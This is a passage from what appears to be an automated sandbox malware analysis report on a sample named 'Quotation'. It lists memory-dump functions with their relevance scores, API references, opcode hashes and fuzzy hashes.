                                          Function 058D8C44 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5
                                          • API String ID: 0-2226203566
                                          • Opcode ID: 11df786b48c1b64afd4734c343e86b34a61599f2500c8cef35223879bad7d3f3
                                          • Instruction ID: 3f1c85ac3a896a1c32559bb09afb7711611650d4741ff5d9fe8f0bc22e5f4542
                                          • Opcode Fuzzy Hash: 11df786b48c1b64afd4734c343e86b34a61599f2500c8cef35223879bad7d3f3
                                          • Instruction Fuzzy Hash: 5541CE70905228CFEB60DF55C988BE9BBF2AB49315F10A0EAD909B7254C7745EC4CF25
                                          Function 0593E8F8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0593E997
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 66f4cb0b81d4754224da7ec03ac1e2c96d7120cc43486906eb6f3d0ff9c787d3
                                          • Instruction ID: 447c7502e05c711c4af4c7194dab058c49a334b45f39f1c47ff62232a45547d2
                                          • Opcode Fuzzy Hash: 66f4cb0b81d4754224da7ec03ac1e2c96d7120cc43486906eb6f3d0ff9c787d3
                                          • Instruction Fuzzy Hash: F231A7B8D00248DFDF10CFA9D881A9EFBB5BF49310F20942AE814B7210D735A945CFA8
                                          Function 058D964C Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6
                                          • API String ID: 0-498629140
                                          • Opcode ID: 3946792e7cffc9cf564f9f9546d7d7828d3d9ccb9cc43d3ba160ab0cd01849f5
                                          • Instruction ID: b1fb6b6e2131ff48fd2d002515046af5337adc7464ffb6e7dfb0799743e10e4b
                                          • Opcode Fuzzy Hash: 3946792e7cffc9cf564f9f9546d7d7828d3d9ccb9cc43d3ba160ab0cd01849f5
                                          • Instruction Fuzzy Hash: 21119DB4A05228CFDB60DF64C998BDABBF1BB48308F0081D9D91DA7251D7355E82CF00
                                          Function 058DA175 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !
                                          • API String ID: 0-2657877971
                                          • Opcode ID: f0710fec0e64e1c453d33c68ddf08d68a7b40f9cf51e479ef92bddd1e3af49c8
                                          • Instruction ID: 23526e6d6890292323f36a5603fbf2ce554e349aa9b7475c66424fbc7603201e
                                          • Opcode Fuzzy Hash: f0710fec0e64e1c453d33c68ddf08d68a7b40f9cf51e479ef92bddd1e3af49c8
                                          • Instruction Fuzzy Hash: 9EF0E7B290125AEFDB15CF90CC44FEABBF9BB09324F14469AE509EB181D3709A45CF20
                                          Function 058D9344 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: =
                                          • API String ID: 0-2322244508
                                          • Opcode ID: 88196a4ce5a31d03ca2b9a5eefe9ff4ff65f78f98b908e11a0e13d9ce366f493
                                          • Instruction ID: 8b881bdf86725bca8fbb434d7321ce3b1ab93a7011ca8edb91c47c29746d1c91
                                          • Opcode Fuzzy Hash: 88196a4ce5a31d03ca2b9a5eefe9ff4ff65f78f98b908e11a0e13d9ce366f493
                                          • Instruction Fuzzy Hash: F001C070D41669CFDB64DF64DD58BEDBBB1AB88301F1040EA9519BB340DA301EC48F00
                                          Function 058D8E30 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /
                                          • API String ID: 0-2043925204
                                          • Opcode ID: 4cd59185ea866c0e70c69a3e2a6fce6182667b7ffa579f33cd54a689f8e11efc
                                          • Instruction ID: 72d0d0088a131b269cb6799747f0d986e0b2f192c67d9f54f2249342d1575858
                                          • Opcode Fuzzy Hash: 4cd59185ea866c0e70c69a3e2a6fce6182667b7ffa579f33cd54a689f8e11efc
                                          • Instruction Fuzzy Hash: FBF0747494021D9FDB54DF54C994ADDB7F5AB59304F4080EAC50AA7281DB31AE45CF11
                                          Function 058D9495 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /
                                          • API String ID: 0-2043925204
                                          • Opcode ID: 5232237c57a885d07b7346f5ebf9792ca02b9c7356ec853efa5e175d3e7d2245
                                          • Instruction ID: 29aa9beae95bfce88c903d4b6be2021e93a8a53adf9d8d90352754f24bb13598
                                          • Opcode Fuzzy Hash: 5232237c57a885d07b7346f5ebf9792ca02b9c7356ec853efa5e175d3e7d2245
                                          • Instruction Fuzzy Hash: A1F0AE74A04258CFCB60CF54C984BD9F7F5BB09308F0480EAC90AA7281D774AE85CF02
                                          Function 057886E2 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: s
                                          • API String ID: 0-453955339
                                          • Opcode ID: 63b06f10e25f6d292d0bb629afaacf3d25a3a4176cd3a558bd8eaae9e9215e38
                                          • Instruction ID: 5e27acdc185957503c662c05ccdfeb6c9905432f579cbd9fc3373f8d3c8998eb
                                          • Opcode Fuzzy Hash: 63b06f10e25f6d292d0bb629afaacf3d25a3a4176cd3a558bd8eaae9e9215e38
                                          • Instruction Fuzzy Hash: 23F030F4849359EFDB119F14D4843A97BB2BB07300F1006DAE505D2141D7348984DF1A
                                          Function 057805B9 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: T
                                          • API String ID: 0-3187964512
                                          • Opcode ID: 95ba21841031f85648c2613995aed827d85b1f1fae4dab28e3b03523965ea661
                                          • Instruction ID: 8e5858aa3b3fb3302ec3dcb2d6c2fba4bd3793c4d0049aaa64dda4b714d2d368
                                          • Opcode Fuzzy Hash: 95ba21841031f85648c2613995aed827d85b1f1fae4dab28e3b03523965ea661
                                          • Instruction Fuzzy Hash: 88E09278C6A218CBCB65DF10C89D7EDBBB1BB09314F10A29AD90973250C7352A89DF08
                                          Function 058D907A Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 8b152368d674a4d19ff726e0e601fd92d30bec6403c84fa5b65fe5738677eb46
                                          • Instruction ID: bd9ee67434b0526e64b99e9a21ff22e917ad8a3f5b42d7cf7443bb11739502a2
                                          • Opcode Fuzzy Hash: 8b152368d674a4d19ff726e0e601fd92d30bec6403c84fa5b65fe5738677eb46
                                          • Instruction Fuzzy Hash: D6E0B67490526CCFDB60CB21C848799B7F2BB02318F0051C5C40DB3244CB741EC88F11
                                          Function 0578912C Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: e
                                          • API String ID: 0-4024072794
                                          • Opcode ID: 2b54b479e41731576bf3b49f286c2b794faf3873640f4e6db3d87e9cea04140c
                                          • Instruction ID: bf1d29251cd1ff434393838b67c5fb5bcc18169aa2122b78630d3eea04ed8a00
                                          • Opcode Fuzzy Hash: 2b54b479e41731576bf3b49f286c2b794faf3873640f4e6db3d87e9cea04140c
                                          • Instruction Fuzzy Hash: 1AE0ECB098475ADBDB70DF24DC88BFA7BB2BB05306F1056A9911A63290CB744D84CF01
                                          Function 058D9097 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2567322570
                                          • Opcode ID: da93e94e4a1db8a103c9b9d7c9f315491ba233fed8ef118e17a6bd258c24c9e3
                                          • Instruction ID: 954fbb258ef6059cc5bae94a752694ec0c7c4a0c9daba08c01b1cb028803f090
                                          • Opcode Fuzzy Hash: da93e94e4a1db8a103c9b9d7c9f315491ba233fed8ef118e17a6bd258c24c9e3
                                          • Instruction Fuzzy Hash: CAE0427990A22DCFDB20DF20DA48BD9BBF5BB04359F0454D6C409A72A4D7349B85CF01
                                          Function 05780F59 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M
                                          • API String ID: 0-3664761504
                                          • Opcode ID: dd5128267ff15480e07bfda9f8f351e5ed090a629980f032850b985ee81e269b
                                          • Instruction ID: 676928a4419c4a98fca52420e8098de918f37a220b95e0a5561d6de58e71ca4f
                                          • Opcode Fuzzy Hash: dd5128267ff15480e07bfda9f8f351e5ed090a629980f032850b985ee81e269b
                                          • Instruction Fuzzy Hash: 71D09278D6512E8BDB64DF10C889BEDB7B2BB08304F1050EAC50DB3250D7346E848F44
                                          Function 0584A120 Relevance: .7, Instructions: 677COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13201faeb6db210a5ec3b5edf6e0cf52b33f7f00370bc2e8a02b9e1cd8f01aef
                                          • Instruction ID: 946002a54dec62ae849b92df2f8a0e89edba74fc8aca62389494203beb75c5e1
                                          • Opcode Fuzzy Hash: 13201faeb6db210a5ec3b5edf6e0cf52b33f7f00370bc2e8a02b9e1cd8f01aef
                                          • Instruction Fuzzy Hash: 8152FB75A002288FDB68DF68C955BEDBBF2BB88300F5541D9E909EB351DA309D81CF61
                                          Function 056E0D98 Relevance: .6, Instructions: 577COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2253943249.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_56e0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 553565b2ff6419a506a005b6753d91c22b5573cfd090b82a2f1a16a9d04f9b52
                                          • Instruction ID: 70ac99b7885f6dc11adf4d335b7082084f036ecc907494dc3d011efaa9b2ee6d
                                          • Opcode Fuzzy Hash: 553565b2ff6419a506a005b6753d91c22b5573cfd090b82a2f1a16a9d04f9b52
                                          • Instruction Fuzzy Hash: BC42D574E0620DCFDB14CB94C598ABEBBB2FF4A301F108159D6226B794CB346982CF51
                                          Function 05844A6F Relevance: .5, Instructions: 548COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48e1f688819b6024237169a52cbfd6538ac4b4e194e841012ccf2ecb58871fc2
                                          • Instruction ID: b0b61779d2443f1d3176ef3d82b88bf7badb5c51e6e3031a10a1800d7ccdaf14
                                          • Opcode Fuzzy Hash: 48e1f688819b6024237169a52cbfd6538ac4b4e194e841012ccf2ecb58871fc2
                                          • Instruction Fuzzy Hash: 59223835A002099FDB14DF68C894B69BBB6BF88314F158069ED16EB3A5DB75EC40CF90
                                          Function 0584B23D Relevance: .5, Instructions: 534COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b5cd94de9c4c98f72fa60a260a7280500540858b8b581fe291dd96571d542a6
                                          • Instruction ID: f743da36f4ae9e27409dfb381f4a2e416c2ad21f6ff20edf834ce83c1931b68c
                                          • Opcode Fuzzy Hash: 6b5cd94de9c4c98f72fa60a260a7280500540858b8b581fe291dd96571d542a6
                                          • Instruction Fuzzy Hash: 1412C171A083598FDB15EF38D86177E7BA2AF81316F0544AADD82CB391DA34CC44CB66
                                          Function 05847990 Relevance: .5, Instructions: 479COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 880cffd207a0b8c84c63eccbbd1e3ccaf358557d778ec270f6e7c0d41b12848c
                                          • Instruction ID: 2f63512f89f51b352bfd18b2a88a9b0f97e09bd68109d80db9a0152aeb6a87f2
                                          • Opcode Fuzzy Hash: 880cffd207a0b8c84c63eccbbd1e3ccaf358557d778ec270f6e7c0d41b12848c
                                          • Instruction Fuzzy Hash: 98124B31A007088FDB28DFA5D884A6EBBB2FF88300F148569E956DB354DB35AC46CF51
                                          Function 0584D528 Relevance: .4, Instructions: 437COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 811ccf423bec6f3fc36084c46af579fb8753cca696ff0b4d1b776a22b37af6d2
                                          • Instruction ID: b1af35c055f7227095e548d7d1c7bd64fb8aebc68650cf25ac4b1f47357b77a9
                                          • Opcode Fuzzy Hash: 811ccf423bec6f3fc36084c46af579fb8753cca696ff0b4d1b776a22b37af6d2
                                          • Instruction Fuzzy Hash: 0612DB34B102198FDB14EF68C894AADB7B2BF89300F5185A8D94AAB355DF30AD85CF41
                                          Function 05849240 Relevance: .4, Instructions: 370COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00d28919721b9b7f13482d9e245f7d67e86945ba16e57f3f815b98714a78840f
                                          • Instruction ID: 3f8d6562454ce8c8d6699ce75fe3549bc292e7c85ee23d181847b83f7444b4fd
                                          • Opcode Fuzzy Hash: 00d28919721b9b7f13482d9e245f7d67e86945ba16e57f3f815b98714a78840f
                                          • Instruction Fuzzy Hash: F1F1B734A10218DFDB14EFA4D598A9EBBB2BF89300F118559E806AB365DB71EC46CF41
                                          Function 056E18C0 Relevance: .4, Instructions: 362COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2253943249.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_56e0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cb6133d92f67ddc18c7510b0bf63ce3bb01deffc0684af7d082f2e5a1345b8b
                                          • Instruction ID: fe5e9c5004b58970fb4ff28ad0f6365d8e3d29958c87c1d186605aac3fa038df
                                          • Opcode Fuzzy Hash: 0cb6133d92f67ddc18c7510b0bf63ce3bb01deffc0684af7d082f2e5a1345b8b
                                          • Instruction Fuzzy Hash: E1F1C134E4620CDFCB58DFA8E5986ADBBB2FF4A315F204569E426A7350DB345982CF01
                                          Function 0584DC10 Relevance: .4, Instructions: 359COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1867c3ab1359b113d0d4e71b1e03ed915c1df911d571df1a9c14af159b7b97b7
                                          • Instruction ID: bdf763f6c090150c6ddab511dbec90fe00925e934ff54ffb5b2072696e75c03e
                                          • Opcode Fuzzy Hash: 1867c3ab1359b113d0d4e71b1e03ed915c1df911d571df1a9c14af159b7b97b7
                                          • Instruction Fuzzy Hash: 91E10E34A01209DFCB18EFA4D494AADBBB2FF89300F148569ED169B364DB34AD45CF91
                                          Function 05845A80 Relevance: .3, Instructions: 337COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09935fa4dbb1690df69b6bfa955c676e82aca38e87f4ef2a0d58460e6818420b
                                          • Instruction ID: 58233d284fbb8612fec3a8bc1bf38599dd884f15ba12a10690254deddcf7fc2e
                                          • Opcode Fuzzy Hash: 09935fa4dbb1690df69b6bfa955c676e82aca38e87f4ef2a0d58460e6818420b
                                          • Instruction Fuzzy Hash: 56B1C0323046158FEB19DF69D854BAE7BA2FF85711B14806AED16CB391CB34DC42CBA1
                                          Function 057825EE Relevance: .3, Instructions: 281COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9262e3f968f6fc6a2c76ac92d3cfc083dea73ddbd037569a9ca3811bd7fff8d
                                          • Instruction ID: 5f099d67e0344e3bf60d6e9cc6274a4a0c71acb63b8883d3ba288d8bb77553cd
                                          • Opcode Fuzzy Hash: a9262e3f968f6fc6a2c76ac92d3cfc083dea73ddbd037569a9ca3811bd7fff8d
                                          • Instruction Fuzzy Hash: 60C11478E48208CFDB51EFA9C5447BDBBB6FB49302F20406AD516AB286C7346E42DF51
                                          Function 0584E1B0 Relevance: .3, Instructions: 273COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cb0590fb815a9804ce0c3c7d579707dfcf27032332aacdf557197c4ff2e0e5b
                                          • Instruction ID: b16f4d42b8e766dfdb44f894cb7a576a55accfbf1dd7c7bcf0e8d3ea780b701d
                                          • Opcode Fuzzy Hash: 2cb0590fb815a9804ce0c3c7d579707dfcf27032332aacdf557197c4ff2e0e5b
                                          • Instruction Fuzzy Hash: F2A17F717042049FD7199F68D854E2ABBB6FF89310F1585A9EA06CB3A1CB35EC42DF81
                                          Function 056E1598 Relevance: .2, Instructions: 231COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2253943249.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_56e0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0fc3fccce256cf161a68a8208e70e415dcdf53efb6565c18d5b5721cc3b6318a
                                          • Instruction ID: 30ed1864f7ca3b8ea4574f8f9943547c03c859ef862e54463f5ed7be1d820a0c
                                          • Opcode Fuzzy Hash: 0fc3fccce256cf161a68a8208e70e415dcdf53efb6565c18d5b5721cc3b6318a
                                          • Instruction Fuzzy Hash: 83A1E574E02208CFCB58DFA5D5586EEBBB2FF4A301F148029D516A7390CB355982DF50
                                          Function 05849231 Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ace027c94f19715bcb03c1753dea58d5231e4c77a8e417a9e7e8068ede396163
                                          • Instruction ID: f69d613874afe69d1902dcd5e864d536608074857349454c095fd33aff2d21a0
                                          • Opcode Fuzzy Hash: ace027c94f19715bcb03c1753dea58d5231e4c77a8e417a9e7e8068ede396163
                                          • Instruction Fuzzy Hash: 03A1A834A10218DFDB14EFA4D89899EBBB2FF89300F158559E806AB365DF74AC46CF41
                                          Function 0584E4D0 Relevance: .2, Instructions: 220COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33986404656a709132e40cbf278b94ae775e55d806ed7e73b6401ba44a6d2353
                                          • Instruction ID: aa43211f249716de934a01fd06cd4f07c3fc1aff9a0254cc587bc77cfab26225
                                          • Opcode Fuzzy Hash: 33986404656a709132e40cbf278b94ae775e55d806ed7e73b6401ba44a6d2353
                                          • Instruction Fuzzy Hash: C0811934B102189FDB14EF68D498A6EB7B6BF88610F108469ED06DB3A1DB34EC41CF91
                                          Function 05840938 Relevance: .2, Instructions: 217COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6858f62116a71fa4c3587bcd096691d7ed7d36de30f468e4d618418ce6f43121
                                          • Instruction ID: 1b320377c0e3649b2dd4a4c29b251c65cdfc655730d58c82c7a5f3f7ccf370cb
                                          • Opcode Fuzzy Hash: 6858f62116a71fa4c3587bcd096691d7ed7d36de30f468e4d618418ce6f43121
                                          • Instruction Fuzzy Hash: 93811435A11208DFDB15DBA4D559AAEBBB2BB88315F148069EE02EB390CA359D41CF50
                                          Function 05845F50 Relevance: .2, Instructions: 208COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f45a1eb6b44d2a93edd25a377c5d3abb5225706c97596ae2ac1ad2a33ffca56f
                                          • Instruction ID: d5c5a756e8e53b0d0310e50732785563bd5725e5b21abd14351792d2d7b34c64
                                          • Opcode Fuzzy Hash: f45a1eb6b44d2a93edd25a377c5d3abb5225706c97596ae2ac1ad2a33ffca56f
                                          • Instruction Fuzzy Hash: 08810535A00618CFDB14DF69C4949AEB7F6BF89310B1581A9E806DB361EB31ED41CF90
                                          Function 058DAF67 Relevance: .2, Instructions: 180COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 739cb80e279c85a5795ae07b139c98952718969abf7f9bf3fe47bdfbc9b3ed93
                                          • Instruction ID: 6cf6f9e5446e2f06df3ca63121ab61cbc80ad79f91bc4fe9b8b1e9891a40f7fe
                                          • Opcode Fuzzy Hash: 739cb80e279c85a5795ae07b139c98952718969abf7f9bf3fe47bdfbc9b3ed93
                                          • Instruction Fuzzy Hash: 5091A275D04218CFEB64CFA4D844BADFBF2BB49308F1080AAD909AB251DB759E85DF11
                                          Function 058434D1 Relevance: .2, Instructions: 174COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46ce99e9eb7f87a0bde05ee8a6a22698bc57329d9ec6d7c0d4c3eb6bb2f0188b
                                          • Instruction ID: 276320cf098bd90c81b31b87fd2d2af44520347cdc92a7cc7e5ee30b2828594f
                                          • Opcode Fuzzy Hash: 46ce99e9eb7f87a0bde05ee8a6a22698bc57329d9ec6d7c0d4c3eb6bb2f0188b
                                          • Instruction Fuzzy Hash: 6E519A317007058FDB19AF74C854A2E7BB2AF89301B50886DE906DB3A0DF35EC46CB92
                                          Function 058DAB17 Relevance: .2, Instructions: 170COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
